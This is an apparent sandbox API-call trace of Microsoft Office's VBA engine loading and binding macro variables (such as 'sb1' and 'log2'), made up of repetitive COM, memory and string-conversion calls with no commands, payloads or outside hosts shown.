[0042.071] SetErrorMode (uMode=0x8001) returned 0x8001 [0042.071] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0042.071] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0042.072] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e6) returned 1 [0042.072] SetErrorMode (uMode=0x8001) returned 0x8001 [0042.072] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x26b) returned 0x7fee439d5a8 [0042.072] GetCurrentProcess () returned 0xffffffffffffffff [0042.072] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cad0c4, dwSize=0x4b) returned 1 [0042.072] RtlLookupFunctionEntry (in: ControlPc=0x6cad0c4, ImageBase=0x182d98, HistoryTable=0x182da0 | out: ImageBase=0x182d98, HistoryTable=0x182da0) returned 0x0 [0042.072] VirtualProtect (in: lpAddress=0x6cad0c4, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x182e9c | out: lpflOldProtect=0x182e9c*=0x40) returned 1 [0042.072] RtlAddFunctionTable (FunctionTable=0x6cad11c, EntryCount=0x1, BaseAddress=0x6cad000, TargetGp=0x182e9c) returned 1 [0042.072] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.072] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.072] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.072] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.072] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.072] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.072] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.072] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.072] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.072] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.072] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.072] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.072] IUnknown:AddRef (This=0x6bb49d0) returned 0x4 [0042.072] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.072] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.072] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.073] VarAdd (in: pvarLeft=0x6b7eb50, pvarRight=0x6b7eb80, pvarResult=0x6b7eb68 | out: pvarResult=0x6b7eb68) returned 0x0 [0042.073] ITypeComp:RemoteBind (in: This=0x6990970, szName="sb1", lHashVal=0x10d2dc, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50504fa, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="sb1") returned 4 [0042.073] ITypeComp:RemoteBind (in: This=0x6992860, szName="sb1", lHashVal=0x10d2dc, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50504fa, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="sb1") returned 4 [0042.073] ITypeComp:RemoteBind (in: This=0x6992e00, szName="sb1", lHashVal=0x10d2dc, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.073] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sb1") returned 0x10d2dc [0042.073] strcpy_s (in: _Dst=0x182c90, _DstSize=0x4, _Src="sb1" | out: _Dst="sb1") returned 0x0 [0042.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182c90, cbMultiByte=4, lpWideCharStr=0x182ae0, cchWideChar=4 | out: lpWideCharStr="sb1") returned 4 [0042.073] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.073] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="sb1", lHashVal=0x10d2dc, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.073] IUnknown:Release (This=0x6990960) returned 0xa [0042.073] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.073] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="sb1", lHashVal=0x10d2dc, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.073] IUnknown:Release (This=0x6992850) returned 0x11 [0042.073] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.073] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="sb1", lHashVal=0x10d2dc, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.073] IUnknown:Release (This=0x6992df0) returned 0xc [0042.073] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.074] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="sb1", lHashVal=0x10d2dc, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.074] IUnknown:Release (This=0x6992580) returned 0x6 [0042.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50504fa, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="sb1") returned 4 [0042.074] ITypeComp:RemoteBind (in: This=0x6992590, szName="sb1", lHashVal=0x10d2dc, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50504fa, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="sb1") returned 4 [0042.074] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="sb1", lHashVal=0x10d2dc, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.074] IMalloc:Alloc (This=0x7feffc15380, cb=0xb) returned 0x6c348d0 [0042.074] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x4, _Src=0x50504fa | out: _Dst=0x6c348d0) returned 0x0 [0042.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sb1") returned 0x108fed [0042.074] strcpy_s (in: _Dst=0x182e40, _DstSize=0xb, _Src="_B_var_sb1" | out: _Dst="_B_var_sb1") returned 0x0 [0042.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182e40, cbMultiByte=11, lpWideCharStr=0x182c90, cchWideChar=11 | out: lpWideCharStr="_B_var_sb1") returned 11 [0042.074] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.074] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_sb1", lHashVal=0x108fed, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.074] IUnknown:Release (This=0x6990960) returned 0xa [0042.074] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.074] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_sb1", lHashVal=0x108fed, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.074] IUnknown:Release (This=0x6992850) returned 0x11 [0042.074] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.074] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_sb1", lHashVal=0x108fed, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.074] IUnknown:Release (This=0x6992df0) returned 0xc [0042.074] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.074] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_sb1", lHashVal=0x108fed, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.074] IUnknown:Release (This=0x6992580) returned 0x6 [0042.074] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.074] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_sb1", lHashVal=0x108fed, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.074] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.074] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.074] IUnknown:Release (This=0x6990960) returned 0xa [0042.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050812, cbMultiByte=11, lpWideCharStr=0x182cf0, cchWideChar=12 | out: lpWideCharStr="_B_var_sb1") returned 11 [0042.074] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_sb1", lHashVal=0x108fed, wFlags=0x5, ppTInfo=0x182ca8, pDescKind=0x182cbc, ppFuncDesc=0x182cc0, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ca8*=0x0, pDescKind=0x182cbc*=0, ppFuncDesc=0x182cc0, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.074] _mbscpy_s (in: _Dst=0x182eb0, _DstSizeInBytes=0x4, _Src=0x50504fa | out: _Dst=0x182eb0) returned 0x0 [0042.074] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0xb8) returned 0x6b0e5a0 [0042.074] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfd90) [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.075] GetCurrentProcess () returned 0xffffffffffffffff [0042.075] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.075] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.075] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.075] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.075] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.075] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.075] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.075] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.075] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.075] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.075] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.075] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.075] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.075] IUnknown:AddRef (This=0x6bb49d0) returned 0x4 [0042.075] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.075] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.075] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.075] ITypeComp:RemoteBind (in: This=0x6990970, szName="log2", lHashVal=0x10b162, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050482, cbMultiByte=5, lpWideCharStr=0x182bd0, cchWideChar=6 | out: lpWideCharStr="log2") returned 5 [0042.075] ITypeComp:RemoteBind (in: This=0x6992860, szName="log2", lHashVal=0x10b162, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050482, cbMultiByte=5, lpWideCharStr=0x182bd0, cchWideChar=6 | out: lpWideCharStr="log2") returned 5 [0042.076] ITypeComp:RemoteBind (in: This=0x6992e00, szName="log2", lHashVal=0x10b162, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.076] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="log2") returned 0x10b162 [0042.076] strcpy_s (in: _Dst=0x182b30, _DstSize=0x5, _Src="log2" | out: _Dst="log2") returned 0x0 [0042.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182b30, cbMultiByte=5, lpWideCharStr=0x182980, cchWideChar=5 | out: lpWideCharStr="log2") returned 5 [0042.076] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.076] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="log2", lHashVal=0x10b162, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.076] IUnknown:Release (This=0x6990960) returned 0xa [0042.076] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.076] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="log2", lHashVal=0x10b162, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.076] IUnknown:Release (This=0x6992850) returned 0x11 [0042.076] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.076] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="log2", lHashVal=0x10b162, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.076] IUnknown:Release (This=0x6992df0) returned 0xc [0042.076] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.076] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="log2", lHashVal=0x10b162, pfName=0x182a50, pBstrLibName=0x182980 | out: pfName=0x182a50*=0, pBstrLibName=0x182980) returned 0x0 [0042.076] IUnknown:Release (This=0x6992580) returned 0x6 [0042.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050482, cbMultiByte=5, lpWideCharStr=0x182bd0, cchWideChar=6 | out: lpWideCharStr="log2") returned 5 [0042.076] ITypeComp:RemoteBind (in: This=0x6992590, szName="log2", lHashVal=0x10b162, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050482, cbMultiByte=5, lpWideCharStr=0x182bd0, cchWideChar=6 | out: lpWideCharStr="log2") returned 5 [0042.076] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="log2", lHashVal=0x10b162, wFlags=0x5, ppTInfo=0x182b88, pDescKind=0x182b9c, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182b88*=0x0, pDescKind=0x182b9c*=0, ppFuncDesc=0x182ba0, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.076] IMalloc:Alloc (This=0x7feffc15380, cb=0xc) returned 0x6c348d0 [0042.076] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x5, _Src=0x5050482 | out: _Dst=0x6c348d0) returned 0x0 [0042.076] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_log2") returned 0x10168f [0042.076] strcpy_s (in: _Dst=0x182ce0, _DstSize=0xc, _Src="_B_var_log2" | out: _Dst="_B_var_log2") returned 0x0 [0042.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182ce0, cbMultiByte=12, lpWideCharStr=0x182b30, cchWideChar=12 | out: lpWideCharStr="_B_var_log2") returned 12 [0042.076] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.076] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_log2", lHashVal=0x10168f, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.076] IUnknown:Release (This=0x6990960) returned 0xa [0042.076] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.076] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_log2", lHashVal=0x10168f, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.077] IUnknown:Release (This=0x6992850) returned 0x11 [0042.077] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.077] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_log2", lHashVal=0x10168f, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.077] IUnknown:Release (This=0x6992df0) returned 0xc [0042.077] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.077] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_log2", lHashVal=0x10168f, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.077] IUnknown:Release (This=0x6992580) returned 0x6 [0042.077] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.077] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_log2", lHashVal=0x10168f, pfName=0x182c00, pBstrLibName=0x182b30 | out: pfName=0x182c00*=0, pBstrLibName=0x182b30) returned 0x0 [0042.077] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.077] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.077] IUnknown:Release (This=0x6990960) returned 0xa [0042.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505083e, cbMultiByte=12, lpWideCharStr=0x182b90, cchWideChar=13 | out: lpWideCharStr="_B_var_log2") returned 12 [0042.077] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_log2", lHashVal=0x10168f, wFlags=0x5, ppTInfo=0x182b48, pDescKind=0x182b5c, ppFuncDesc=0x182b60, ppVarDesc=0x6c005f00720061, ppTypeComp=0x3200000000, pDummy=0x0 | out: ppTInfo=0x182b48*=0x0, pDescKind=0x182b5c*=0, ppFuncDesc=0x182b60, ppVarDesc=0x6c005f00720061, ppTypeComp=0x3200000000, pDummy=0x0) returned 0x0 [0042.077] _mbscpy_s (in: _Dst=0x182d50, _DstSizeInBytes=0x5, _Src=0x5050482 | out: _Dst=0x182d50) returned 0x0 [0042.077] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.077] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.077] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d08 | out: ppvObject=0x182d08*=0x0) returned 0x80004002 [0042.077] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d00 | out: ppvObject=0x182d00*=0x0) returned 0x80004002 [0042.077] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.077] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x182f58, pDummy=0x0 | out: ppTypeAttr=0x182f58, pDummy=0x0) returned 0x0 [0042.077] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.077] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.077] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.077] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.078] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x1824f0, pDummy=0x0 | out: ppTypeAttr=0x1824f0, pDummy=0x0) returned 0x0 [0042.078] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.078] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.078] IUnknown:Release (This=0x6ceee08) returned 0x4 